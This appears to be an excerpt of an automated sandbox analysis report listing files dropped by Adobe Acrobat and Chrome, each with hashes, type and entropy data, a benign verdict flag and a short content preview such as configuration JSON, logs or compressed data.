                                                                                        Preview:{"analyticsData":{"responseGUID":"3c10f4bc-992a-4598-b59f-f9e9e8a5edf9","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733941582289,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):286
                                                                                        Entropy (8bit):5.2214301962341
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXM+/LrDINVx+FIbRI6XVW7+0Y8qoAvJfshHHrPeUkwRe9:YvXKXLLrDeyYpW7TZGUUUkee9
                                                                                        MD5:0A638E0C4A2673F0D8DFA50CA376EDD0
                                                                                        SHA1:5CC5E011500D05E2FBC125F8A601F99046F5A6DC
                                                                                        SHA-256:08528F29195FD56C2E9342E166B11417162391D39B67AB836414E3C9E22B6F00
                                                                                        SHA-512:1C513543C77184D8C600E3673696444B76F3F72EDE8902102BA8B4A70B4CEF0743420B05B00B5791FE69BBDE43AF0C21B4120396CC45D6B0FD0E83A1798DFB62
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"3c10f4bc-992a-4598-b59f-f9e9e8a5edf9","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733941582289,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):282
                                                                                        Entropy (8bit):5.234963397796888
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXM+/LrDINVx+FIbRI6XVW7+0Y8qoAvJTqgFCrPeUkwRe9:YvXKXLLrDeyYpW7TZGTq16Ukee9
                                                                                        MD5:5372C40020182EC486E2D7F52A0114B6
                                                                                        SHA1:B8304CB788D54B01CC8D08B5E649599E1E11CCCB
                                                                                        SHA-256:559D27B7B8CB7797878DAFBDF84EF0C0088EF1091787149D3D0C99D0C7A1F84C
                                                                                        SHA-512:FD0101E93CFE760C63A09EAD6B68A6B614FBAEEE0C68E19AC7409C08481509A304D8434FD65587EC9E7FBD333CD76FDD39E1BF3DACDFEBBA9FDFC798F5557816
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"3c10f4bc-992a-4598-b59f-f9e9e8a5edf9","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733941582289,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):4
                                                                                        Entropy (8bit):0.8112781244591328
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:e:e
                                                                                        MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                        SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                        SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                        SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                        Malicious:false
                                                                                        Preview:....
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):2817
                                                                                        Entropy (8bit):5.144232436445639
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:YR5qD0dNgHc8KHLYkuzN4mWk+oUj+jBjoCvcO66h9qhzx:o5qAdNgHc8KHLYkuzN4mWN3C9joCUOdq
                                                                                        MD5:5F37D996746C5B04941C9CD6A5DCBC12
                                                                                        SHA1:1933E61FFF283F446B0E31A388AE22D5003CA872
                                                                                        SHA-256:76776FDD8C4D1FC3FEF23FE9D531CC672B39CB78370FC23FC65FF98512995950
                                                                                        SHA-512:B2413EBA07F649EF7ABF64B80401B3CBC71748DD7F2D94556E9AA7A3F42A97EE28CF355070C4941733E92659AB06F05713BA3F26F552EB5D149321395BE3AD92
                                                                                        Malicious:false
                                                                                        Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"fc861c75ab49a28067ec894a4be4d81f","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1122,"ts":1733762826000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"adb6d1aa67f2b189aeb38fc31c8f0848","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":1164,"ts":1733762826000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"110453846af28948fd9fb59534cee5d0","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1733762826000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"6b565e250b9cd337783de375f959839a","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1733762826000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"9bcc518202056463bf30fa7c48bbccfe","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":1102,"ts":1733762826000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"d3418e6b3e56a54b3f0fd0f98eecc788","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
                                                                                        Category:dropped
                                                                                        Size (bytes):12288
                                                                                        Entropy (8bit):0.984051380070916
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:TLHRx/XYKQvGJF7urs6I1RZKHs/Ds/SpY9yrjo4zJwtNBwtNbRZ6bRZ4z9yrjoF:TVl2GL7ms6ggOVpz/rzutYtp6PR/U
                                                                                        MD5:4B7966E8AF2342CF08C23BFCFAF36AF8
                                                                                        SHA1:F653C12BF347FC0568730556292F2CE8C3D0F296
                                                                                        SHA-256:4D9122AC4E87E51E571B73EA1BB4549856AA48DD91F703562EFD475F07169FC9
                                                                                        SHA-512:F720F407DF577E775E5AB3FEC1887F7F00BB135E399530B57EA97CFEC9C294A6E4877D03AA8BE44C840B4D3F761A7A92B425B2491CB345C57BAFB08D20203161
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:SQLite Rollback Journal
                                                                                        Category:dropped
                                                                                        Size (bytes):8720
                                                                                        Entropy (8bit):1.339649330205478
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:7+teAD1RZKHs/Ds/SpY9yrjoPzJwtNBwtNbRZ6bRZWf1RZKKpqLBx/XYKQvGJF7p:7MeGgOVpz/UzutYtp6PMdpqll2GL7ms9
                                                                                        MD5:47292709CCC6CADBC38604EB7E8AB4E4
                                                                                        SHA1:681DFA91CDFE9E1FC2EA6266F59DD79A0472F2E4
                                                                                        SHA-256:2118233DE2BC2F96EDAC9D6CC2A5314CF901F392892EF22C4D6BC05806B3E08D
                                                                                        SHA-512:B319423C8EF313C22ED6CB65E7524F40A4BE75B9A33881C8C6D28F70ADC9AAEE9AD891EC633A2E9E9C7295BF2AFF35EC2967666C8D2CDBEEB1281FBC7B7E9B45
                                                                                        Malicious:false
                                                                                        Preview:.... .c.....\........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j...#..#.#.#.#.#.#.#.#.7.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):66726
                                                                                        Entropy (8bit):5.392739213842091
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:RNOpblrU6TBH44ADKZEg33I2OXQT/6rI6yq0PMXGYf0keYyu:6a6TZ44ADE33eXQT/6rISwQeK
                                                                                        MD5:E6171FF7AA43C231B584DFDC23D0128F
                                                                                        SHA1:E0346F6036D4B4E615268CE2712E18573A953E14
                                                                                        SHA-256:95AD4AD2B2A0840DA28F05DD3E943015BCCC65D0EC45E69DEBC5BD2807EFCA23
                                                                                        SHA-512:DE5E3B2A6CE6804F1412AAEE98FC911BDD410FC7CDD5C5486433C0B651B1906308EF2F95950D6C9686DF9DF0B3DF19B9D0D811262CCA05484E4896C8300AD323
                                                                                        Malicious:false
                                                                                        Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):246
                                                                                        Entropy (8bit):3.501595078528367
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K88hlAa3H:Qw946cPbiOxDlbYnuRKrvH
                                                                                        MD5:A8A3951AB4D26063ACB71672D262E9DD
                                                                                        SHA1:B40B725C38906CCCF8964EBADFB16DFFD42E1C41
                                                                                        SHA-256:3CD68EA53D13F3974548DAECC3E086D6F507A2B767585E3E38F8F749590DF4E4
                                                                                        SHA-512:BA8AAE27B21A997A5A3B06FBD543A0180FC7AD1D90FECC6BAA4F046C2E962DF34655BDE2B779EDE35C56D2FC5BEB5F1C973E6D60709EDF2631FA2E307CB27EAC
                                                                                        Malicious:false
                                                                                        Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .0.9./.1.2./.2.0.2.4. . .1.1.:.4.7.:.0.2. .=.=.=.....
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:PDF document, version 1.6, 0 pages
                                                                                        Category:dropped
                                                                                        Size (bytes):358
                                                                                        Entropy (8bit):5.065983386543644
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:IngVMrexJzJT0y9VEQIFVmb/eu2g/86S1kxROOnkm/46km/4VTCSyAAO:IngVMre9T0HQIDmy9g06JXXXFX+TlX
                                                                                        MD5:A1EEAFCC383E0B2D70127ABB58E59F3C
                                                                                        SHA1:68F8C03581ECB1FB609DCB843C67AA75BC833D2C
                                                                                        SHA-256:F2DB125FDE7A98ADC4DC8EE773CE0AE3E0DE5EA19F2EE86A3201761FEFE50D8B
                                                                                        SHA-512:6B77385C2B30BAB7E14DF7D7790A8BE7903F54F24A4BA0764E39205F6F9878C1380A3126F1A61B4450B08FFAAC9F75D5EC576E3B98203C407AF427A413568072
                                                                                        Malicious:false
                                                                                        Preview:%PDF-1.6.%......1 0 obj.<</Pages 2 0 R/Type/Catalog>>.endobj.2 0 obj.<</Count 0/Kids[]/Type/Pages>>.endobj.3 0 obj.<<>>.endobj.xref..0 4..0000000000 65535 f..0000000016 00000 n..0000000061 00000 n..0000000107 00000 n..trailer..<</Size 4/Root 1 0 R/Info 3 0 R/ID[<9C57D81AF2AB0041BBBEA2BA6739AFB9><9C57D81AF2AB0041BBBEA2BA6739AFB9>]>>..startxref..127..%%EOF..
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:ASCII text, with very long lines (393)
                                                                                        Category:dropped
                                                                                        Size (bytes):16525
                                                                                        Entropy (8bit):5.376360055978702
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:6b1sdmfenwop+WP21h2RPjRNg7JjO2on6oU6CyuJw1oaNIIu9EMuJuF6MKK9g9JQ:vIn
                                                                                        MD5:1336667A75083BF81E2632FABAA88B67
                                                                                        SHA1:46E40800B27D95DAED0DBB830E0D0BA85C031D40
                                                                                        SHA-256:F81B7C83E0B979F04D3763B4F88CD05BC8FBB2F441EBFAB75826793B869F75D1
                                                                                        SHA-512:D039D8650CF7B149799D42C7415CBF94D4A0A4BF389B615EF7D1B427BC51727D3441AA37D8C178E7E7E89D69C95666EB14C31B56CDFBD3937E4581A31A69081A
                                                                                        Malicious:false
                                                                                        Preview:SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:961+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):15114
                                                                                        Entropy (8bit):5.390355125484168
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:Ksq0zV2Vb+J0usidRuKoMeeHTsMZChh0Hwim4gwIVShUC4dg7ZoU3ZsZwdPZf94r:QKOb
                                                                                        MD5:0AA9881EE89F1F3F47D693F964CA6EBC
                                                                                        SHA1:7376B4134C9C5518BAC71DB69DEB1952ED3D0470
                                                                                        SHA-256:EE9C8DF7D65F49655A15BB2CFF1C4A47E510740119BA85136260D118764E8E61
                                                                                        SHA-512:B008D3A6E77641555F37283F34F6A90A5C5EB40444F761C759ADA9F96F72254C59C3BBE10C490E516C651086C5EE1B2E078BD1A1FB7EC4D0719E29342A2C15A0
                                                                                        Malicious:false
                                                                                        Preview:SessionID=518e94bf-fd56-445f-a686-19bb6c38497b.1733762816595 Timestamp=2024-12-09T11:46:56:595-0500 ThreadID=7836 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=518e94bf-fd56-445f-a686-19bb6c38497b.1733762816595 Timestamp=2024-12-09T11:46:56:600-0500 ThreadID=7836 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=518e94bf-fd56-445f-a686-19bb6c38497b.1733762816595 Timestamp=2024-12-09T11:46:56:600-0500 ThreadID=7836 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=518e94bf-fd56-445f-a686-19bb6c38497b.1733762816595 Timestamp=2024-12-09T11:46:56:601-0500 ThreadID=7836 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=518e94bf-fd56-445f-a686-19bb6c38497b.1733762816595 Timestamp=2024-12-09T11:46:56:601-0500 ThreadID=7836 Component=ngl-lib_NglAppLib Description="SetConf
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):29752
                                                                                        Entropy (8bit):5.407541339056768
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:GLxxlyVUFcAzWL8VWL1ANSFld5YjMWLvJ8Uy++NSXl3WLd5WLrbhhVClkVMwDGby:2
                                                                                        MD5:FAF27814A2D519F16EDD3ACBEE2995EC
                                                                                        SHA1:D9433B83C63FDC5EDF04CA706ECDADF7629AADB5
                                                                                        SHA-256:8EEB30851659C5906A42BD65C93D10DA0E64820F3E4E731BC857965CE481969E
                                                                                        SHA-512:4EAED0808507D5DB3281FAFD7698F9DAF9B73FFF5B3082ECF3D60541312F1ABF6A66CF2C4440237AE8A1ABBE065F265CB1F61EC7B19F76C4D8A0EE26DE6D4CFF
                                                                                        Malicious:false
                                                                                        Preview:04-10-2023 02:39:31:.---2---..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Starting NGL..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..04-10-2023 02:39:31:.Closing File..04-10-
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 42290
                                                                                        Category:dropped
                                                                                        Size (bytes):1407294
                                                                                        Entropy (8bit):7.97605879016224
                                                                                        Encrypted:false
                                                                                        SSDEEP:24576:NDbdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WL07oXGZzwYIGNPJF:Jb3mlind9i4ufFXpAXkrfUs0jWLxXGZX
                                                                                        MD5:D3D2927BC4723609B69F537AD83E856C
                                                                                        SHA1:780A3D2C4FCB7C4126A7FD53AB72800403D150DD
                                                                                        SHA-256:48452A955CE3D6335BF7EF76ACAB44968F637E4DDE10F49FD5C664EEC615DC8B
                                                                                        SHA-512:401612E3FEBFDB49CE2F5A6095BEE8A18F9928AB9C8EEA60F07E291A2BDF4DAA3FA9AC8F5534C88C1E2DEBB90B915CDA74C9CC3A8267239CF068119D1E1EAB7E
                                                                                        Malicious:false
                                                                                        Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                        Category:dropped
                                                                                        Size (bytes):758601
                                                                                        Entropy (8bit):7.98639316555857
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                                        MD5:3A49135134665364308390AC398006F1
                                                                                        SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                        SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                        SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                        Malicious:false
                                                                                        Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                        Category:dropped
                                                                                        Size (bytes):386528
                                                                                        Entropy (8bit):7.9736851559892425
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                        MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                        SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                        SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                        SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                        Malicious:false
                                                                                        Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                                        Category:dropped
                                                                                        Size (bytes):1419751
                                                                                        Entropy (8bit):7.976496077007677
                                                                                        Encrypted:false
                                                                                        SSDEEP:24576:6DaWL07oXGZGwYIGNPJNdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:caWLxXGZGwZGh3mlind9i4ufFXpAXkru
                                                                                        MD5:7867DAFF192926A49EB7516D226D452F
                                                                                        SHA1:BD0B185B12DB865CEA23060A9789C6B2D814B62E
                                                                                        SHA-256:C7586BA81615BBAA63DA0D81CE18C0D087D1237500C99C35239A4D3CAEED2934
                                                                                        SHA-512:B556042E82056983EA6A69AEE0DAB370641437EF6239FD04676FC26EC9472C6E5EF6194885C165E3987E8019321DCD9B4A574EA7A6253AC3C9468434AEAA0C21
                                                                                        Malicious:false
                                                                                        Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 9 15:47:00 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                        Category:dropped
                                                                                        Size (bytes):2677
